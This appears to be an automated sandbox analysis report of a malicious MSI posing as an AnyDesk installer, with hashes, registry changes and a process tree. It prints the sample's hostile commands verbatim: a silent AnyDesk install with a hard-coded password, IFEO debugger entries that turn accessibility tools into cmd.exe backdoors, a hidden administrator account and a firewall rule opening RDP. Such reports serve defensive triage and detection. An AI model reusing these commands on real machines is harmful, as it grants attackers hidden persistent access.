Analysis
- max time kernel: 90s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-08-2022 16:21

Static task: static1

Behavioral task: behavioral1
- Sample: 1.msi
- Resource: win7-20220718-en

Behavioral task: behavioral2
- Sample: 1.msi
- Resource: win10v2004-20220721-en

General
- Target: 1.msi
- Size: 3.9MB
- MD5: 6cf5ad7a7d1b7bab0c62e246cf41a985
- SHA1: b06a03adc550ead96534f5e723395c4e16bfdf44
- SHA256: fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050
- SHA512: 46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e
Malware Config
Signatures
Executes dropped EXE (6 IoCs)
Processes (pid, process):
- 1604 install.exe
- 4960 anydesk.exe
- 2008 AnyDesk.exe
- 4936 AnyDesk.exe
- 4532 AnyDesk.exe
- 528 anydesk.exe
Modifies Windows Firewall (1 TTPs, 1 IoCs)
Sets file execution options in registry (2 TTPs, 8 IoCs)
Processes (description, ioc, process):
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe (install.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "c:\\windows\\system32\\cmd.exe" (install.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe (install.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "c:\\windows\\system32\\cmd.exe" (install.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe (install.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "c:\\windows\\system32\\cmd.exe" (install.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe (install.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "c:\\windows\\system32\\cmd.exe" (install.exe)
Loads dropped DLL (4 IoCs)
Processes (pid, process):
- 4212 MsiExec.exe
- 4740 MsiExec.exe
- 4740 MsiExec.exe
- 4212 MsiExec.exe
Modifies file permissions (1 TTPs, 2 IoCs)
Processes (pid, process):
- 4384 ICACLS.EXE
- 3528 ICACLS.EXE
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes (description, ioc, process): 48 entries, each "File opened (read-only)" by msiexec.exe on a drive root; every letter A: through Z: other than C: and D: appears twice. In the order recorded:
\??\B:, \??\S:, \??\O:, \??\L:, \??\N:, \??\R:, \??\S:, \??\E:, \??\F:, \??\K:, \??\I:, \??\P:, \??\P:, \??\T:, \??\W:, \??\X:, \??\Z:, \??\G:, \??\N:, \??\O:, \??\H:, \??\Y:, \??\Z:, \??\X:, \??\Q:, \??\K:, \??\U:, \??\F:, \??\G:, \??\V:, \??\J:, \??\A:, \??\B:, \??\R:, \??\V:, \??\J:, \??\M:, \??\T:, \??\A:, \??\H:, \??\I:, \??\W:, \??\E:, \??\L:, \??\Q:, \??\M:, \??\U:, \??\Y:
Modifies WinLogon (2 TTPs, 3 IoCs)
Processes (description, ioc, process):
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (install.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (install.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administartor = "0" (install.exe)
Drops file in System32 directory (1 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Windows\SysWOW64\log1.txt (install.exe)
Drops file in Windows directory (14 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
- File created: C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
- File opened for modification: C:\Windows\Installer\MSIDCC.tmp (msiexec.exe)
- File opened for modification: C:\Windows\LOGS\DPX\setuperr.log (EXPAND.EXE)
- File opened for modification: C:\Windows\Installer\MSIB7AB.tmp (msiexec.exe)
- File created: C:\Windows\Installer\e570c18.msi (msiexec.exe)
- File opened for modification: C:\Windows\Installer\e570c16.msi (msiexec.exe)
- File created: C:\Windows\Installer\SourceHash{AC4583F8-6694-473E-BB77-32CDFC9BA940} (msiexec.exe)
- File opened for modification: C:\Windows\Installer\MSIDBB.tmp (msiexec.exe)
- File opened for modification: C:\Windows\Installer\MSI155F.tmp (msiexec.exe)
- File opened for modification: C:\Windows\LOGS\DPX\setupact.log (EXPAND.EXE)
- File created: C:\Windows\Installer\e570c16.msi (msiexec.exe)
- File opened for modification: C:\Windows\Installer\ (msiexec.exe)
- File opened for modification: C:\Windows\Installer\MSIB6D0.tmp (msiexec.exe)
Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters (vssvc.exe)
- Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr (vssvc.exe)
- Set value (data): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 (vssvc.exe)
- Set value (data): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (vssvc.exe)
Modifies data under HKEY_USERS (10 IoCs)
Processes (description, ioc, process):
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (MsiExec.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "200000" (MsiExec.exe)
- Key deleted: \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e (msiexec.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f (msiexec.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (MsiExec.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (MsiExec.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (MsiExec.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "0" (MsiExec.exe)
- Key deleted: \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E (msiexec.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (MsiExec.exe)
Modifies registry class (38 IoCs)
Processes (description, ioc, process):
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0" (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open (anydesk.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\"" (anydesk.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Clients = 3a0000000000 (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" (anydesk.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Assignment = "1" (msiexec.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AuthorizedLUAApp = "0" (msiexec.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\DeploymentFlags = "3" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04 (msiexec.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Language = "1033" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon (anydesk.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\InstanceType = "0" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell (anydesk.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AdvertiseFlags = "388" (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media\1 = ";" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command (anydesk.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" (anydesk.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64\8F3854CA4966E374BB7723DCCFB99A04 (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\PackageName = "1.msi" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon (anydesk.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Version = "458752" (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04\ProductFeature (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\ProductName = "Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com" (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\PackageCode = "3FB72BC8CB959144EB519E3E5854F372" (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64 (msiexec.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" (anydesk.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command (anydesk.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04 (msiexec.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList (msiexec.exe)
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes (pid, process):
- 2228 msiexec.exe
- 2228 msiexec.exe
- 4960 anydesk.exe
- 4960 anydesk.exe
- 2008 AnyDesk.exe
- 2008 AnyDesk.exe
- 4532 AnyDesk.exe
- 4532 AnyDesk.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (description, pid, process), 64 token entries grouped by process, each group in the order recorded:
- 4680 msiexec.exe (31 entries): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
- 2228 msiexec.exe (21 entries): SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, then SeRestorePrivilege followed by SeTakeOwnershipPrivilege repeated 8 times (16 entries)
- 5032 vssvc.exe (3 entries): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- 1604 install.exe (1 entry): SeRemoteShutdownPrivilege
- 4716 srtasks.exe (8 entries): SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege
Suspicious use of FindShellTrayWindow (5 IoCs)
Processes (pid, process):
- 4680 msiexec.exe
- 4936 AnyDesk.exe
- 4936 AnyDesk.exe
- 4936 AnyDesk.exe
- 4680 msiexec.exe
Suspicious use of SendNotifyMessage (3 IoCs)
Processes (pid, process):
- 4936 AnyDesk.exe
- 4936 AnyDesk.exe
- 4936 AnyDesk.exe
Suspicious use of WriteProcessMemory (44 IoCs)
Processes (description, pid, process, target pid, target process), in the order recorded with repeated identical rows counted:
- PID 2228 msiexec.exe wrote to memory of 4716 srtasks.exe (2 entries)
- PID 2228 msiexec.exe wrote to memory of 4212 MsiExec.exe (3 entries)
- PID 2228 msiexec.exe wrote to memory of 4740 MsiExec.exe (3 entries)
- PID 4740 MsiExec.exe wrote to memory of 4384 ICACLS.EXE (3 entries)
- PID 4740 MsiExec.exe wrote to memory of 5008 EXPAND.EXE (3 entries)
- PID 4740 MsiExec.exe wrote to memory of 1604 install.exe (3 entries)
- PID 1604 install.exe wrote to memory of 2596 cmd.exe (3 entries)
- PID 2596 cmd.exe wrote to memory of 4960 anydesk.exe (3 entries)
- PID 1604 install.exe wrote to memory of 3732 cmd.exe (3 entries)
- PID 3732 cmd.exe wrote to memory of 1308 cmd.exe (3 entries)
- PID 3732 cmd.exe wrote to memory of 4532 AnyDesk.exe (3 entries)
- PID 1604 install.exe wrote to memory of 528 anydesk.exe (3 entries)
- PID 1604 install.exe wrote to memory of 1288 netsh.exe (3 entries)
- PID 4740 MsiExec.exe wrote to memory of 3528 ICACLS.EXE (3 entries)
- PID 4212 MsiExec.exe wrote to memory of 2040 cmd.exe (3 entries)
Processes (process tree; indentation shows parent/child depth)
- C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1.msi
  Signatures: Enumerates connected drives; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures: Enumerates connected drives; Drops file in Windows directory; Modifies data under HKEY_USERS; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\srtasks.exe
    Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding F209592F75EACBCB8A295D511C0C2B32
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files"
  - C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding D2CC458D3D4E53F0CCE4C0795C4D02B0 E Global\MSI0000
    Signatures: Loads dropped DLL; Modifies data under HKEY_USERS; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\ICACLS.EXE
      Command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
      Signatures: Modifies file permissions
    - C:\Windows\SysWOW64\EXPAND.EXE
      Command line: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
      Signatures: Drops file in Windows directory
    - C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe"
      Signatures: Executes dropped EXE; Sets file execution options in registry; Modifies WinLogon; Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
        Signatures: Suspicious use of WriteProcessMemory
        - \??\c:\programdata\anydesk.exe
          Command line: c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
          Signatures: Executes dropped EXE; Modifies registry class; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
        - \??\c:\programdata\anydesk\AnyDesk.exe
          Command line: c:\programdata\anydesk\anydesk.exe --set-password
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
      - \??\c:\programdata\anydesk\anydesk.exe
        Command line: "c:\programdata\anydesk\anydesk.exe" --get-id
        Signatures: Executes dropped EXE
      - C:\Windows\SysWOW64\netsh.exe
        Command line: netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
        Signatures: Modifies Windows Firewall
    - C:\Windows\SysWOW64\ICACLS.EXE
      Command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)LOW
      Signatures: Modifies file permissions
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Checks SCSI registry key(s); Suspicious use of AdjustPrivilegeToken
- C:\ProgramData\AnyDesk\AnyDesk.exe
  Command line: "C:\ProgramData\AnyDesk\AnyDesk.exe" --service
  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
- C:\ProgramData\AnyDesk\AnyDesk.exe
  Command line: "C:\ProgramData\AnyDesk\AnyDesk.exe" --control
  Signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\AnyDesk\AnyDesk.exe
  Filesize: 3.7MB
  MD5: 1bc5890c9e7bf54b7712e344b0af9d04
  SHA1: 78c9302c7a387a8d158f38d501784be9b8b2716d
  SHA256: af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6
  SHA512: 7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d
- C:\ProgramData\AnyDesk\service.conf
  Filesize: 2KB
  MD5: b31412d2595ea971fb79cd9e96c38400
  SHA1: e202be33683d8de3448eed8becb6df3d64093599
  SHA256: a7811761591e1e8da762becfe453aa8f1e043d3f3e661690aec2fa6284cca2c5
  SHA512: 43fe9d4c63fb274ccad196de92af0b461f9c6888f7a025668816de95bedf624bf89cef07a4d04061c51be821f332055f466ebb84cb25d073794a9cefeb6a4350
- C:\ProgramData\AnyDesk\service.conf
  Filesize: 2KB
  MD5: 3c2411ee7e32c635ef1e1a3e77b68a22
  SHA1: d35201685f35f57398d67d93429a536f4f617fba
  SHA256: d5744fb7fb22e203623153254ca2e4daab0e53a9317ef411d5f0327cb6ca4ab4
  SHA512: 407af5d9460d784bd3f24073c6ecf2b421bb025e33997f7dfdf3176693ed4333d752e72be2af3d80942d882cc000889ce2c981ef5ba8f57c05f1cc2e21f84bbf
- C:\ProgramData\AnyDesk\system.conf
  Filesize: 343B
  MD5: bb8dfbe76d0dad2cd06d92c3257d60d2
  SHA1: 9232db6138b537ac13eb965c81dbdac2ed47ff83
  SHA256: 259b8c034d7ca61612db50e6274c411f742bfc433bb86754bdb00e987eee2b3a
  SHA512: 0e2e11461ce1db309c90e7dad14032714cbb8ba636ec6fbeb0fe5bf596c0d949a4df1513947740aeeac10bf91562e552c8cf54bf50c159c48d143ff17e365ebf
- C:\ProgramData\AnyDesk\system.conf
  Filesize: 810B
  MD5: 4075f0e04bffeba05058d8e2a7f8e30c
  SHA1: 9fc55f6886f19fca7023fb8d65e0708ff0edf696
  SHA256: baa719f4cab511c4ef34d3e4bf680839719ec4dd3752fcfe5b4c90d923d1906c
  SHA512: dd05ae1bea9ad7386b504ec40f95197cfea5b549925020918375f37f9c36de380e02e2ae0dbb332173e97e6b22ad19dbcb6b02f0e17c6b70103baf4dc1184ae6
- C:\ProgramData\AnyDesk\system.conf
  Filesize: 1019B
  MD5: fc914a23f6350ce39a6409bad04a75a9
  SHA1: 457f9fe457da77448012210d12ecbf4a8982f091
  SHA256: 305528ea32694c5fb40e0599da5be6ab29a37f8750c42df0a7d7688b06ea6e98
  SHA512: 8def536b2e976ac7028e719e02cd239bb0e834e5295304e611f4a9473bfa2d77e53b5fe402a93db3508a91fa682340f49bb6eff7a6d2d9667d1e19314c1f6d74
- C:\ProgramData\anydesk.exe
  Filesize: 3.7MB
  MD5: 1bc5890c9e7bf54b7712e344b0af9d04
  SHA1: 78c9302c7a387a8d158f38d501784be9b8b2716d
  SHA256: af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6
  SHA512: 7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d
- C:\ProgramData\anydesk\AnyDesk.exe
  Filesize: 3.7MB
  MD5: 1bc5890c9e7bf54b7712e344b0af9d04
  SHA1: 78c9302c7a387a8d158f38d501784be9b8b2716d
  SHA256: af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6
  SHA512: 7113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d
- C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files.cab
  Filesize: 3.6MB
  MD5: 223fa9756fce44168abd5db7afa03fad
  SHA1: 2e8bfc88819353490ec4c201445dc004fa9aaff5
  SHA256: a929c064c064a1b5013b8fbce01feb7ae08e6bd9b05106dcda8320f9db0fb13d
  SHA512: 0efe5917995e6ee837aadbb9951ad1f7bcadfa9638de747b219e6a9bbe53fd586118a291776c6ff1c0416b3b439dadb0336ae61e74b1e6d12e9a38f11dac33ec
- C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe
  Filesize: 3.7MB
  MD5: 8c42ab81f90ee0592f7a709f0f7e320b
  SHA1: 6656c6ca4611245cda44958bab84866196c9d95b
  SHA256: beb6182ceab6ea0b0fdc0f41f8069632317e0f941419b75ede4145593cd6a21c
  SHA512: 57a444d1b03dcd428eb386e5551137df5b7d401ac39f5b3481dad6a94c7a95c3dd90b638532efdd813c293cf4f949ed4461424fa940410f2d59e2dfdd88ca5ea
- C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\msiwrapper.ini
  Filesize: 1KB
  MD5: df5b8330548d41f20407a49308240c3d
  SHA1: 1e578c5c57ef836074af12c0e39d5edcde678eb4
  SHA256: 429a95906fd1e81d471b89012fc638c8f9c368c7b27201078020d656712fc091
  SHA512: fad3a641e55d589c1b827b4f9c16cc0f9633ad8eaf5e91c2904cddfebcda28dcaa3bd9b9e2487555b1289bfe08d99737a690291bb0b20006e551d6a67bd8492b
- C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\msiwrapper.ini
  Filesize: 1KB
  MD5: 84c74be25b73fa01d19579a0ec717ddc
  SHA1: 9be123909ea8a8badce25d58a961dd67e0097ae6
  SHA256: 826b7fd1c84ddbd28bfd2d9f64bf43232ee5c5b199ed2577f7c0463bec96f22c
  SHA512: 1304ec7d3e75216dccbf7130bdde2f39d6a8fbe5d8b8b853ad1773e4e4443d437f958a31309a6374127b7e6aa45bff9155e4283d31e5b17494dba03343419fe7
- C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
  Filesize: 4KB
  MD5: 5484baef0f018c436daf7189fc56201d
  SHA1: a0048dfa12d2a383f297130cd88d646f45b41d31
  SHA256: 7e76353cf42a54c645736751fc692bf46de3a45b1524726a5b30269bc18f60ae
  SHA512: 64e2513f5a7b9d542319e41ec0dcbe7fc7b2edc9899e8460ba2161ef3494876f12ede17a49d6846139729ed12c6c026fedc1d1d380cc3b05bca4e1ba281751ea
- C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
  Filesize: 8KB
  MD5: f54a1fff95b8bab41cbd923f3ab26d27
  SHA1: 9261bbb490d4cdaeb9d3d87e18ce4c27e3ad5c2d
  SHA256: 77c30c5859eb6bcb1ef9ee3c3d377fee392cbc5a6f921b14536876712eb27fab
  SHA512: 00a4b370340fdb2f683fe7cb372dd4f6dd2eac4b222571d3d606ff40440598ca3b594accfa0a0507febeb1a43794ab956e8cff5637b4f62011d5a577d49072d5
- C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
  Filesize: 10KB
  MD5: 5c75f25a890ed190fca81a8160167538
  SHA1: f74a8a28a832c11ed68ce4acc2f7dbad7acf8309
  SHA256: 0352988266a38ee4b5edfc068abb21455f1a03e4333d57082bbef9d081f6d873
  SHA512: 956b7c884ab0418df6c54679052efe9491e4bf6c5f218b2fad4e5e64581eba61fed64e44aa937c7ee428d86136f02614117a2ec8af3bad413d945c727b07781f
- C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
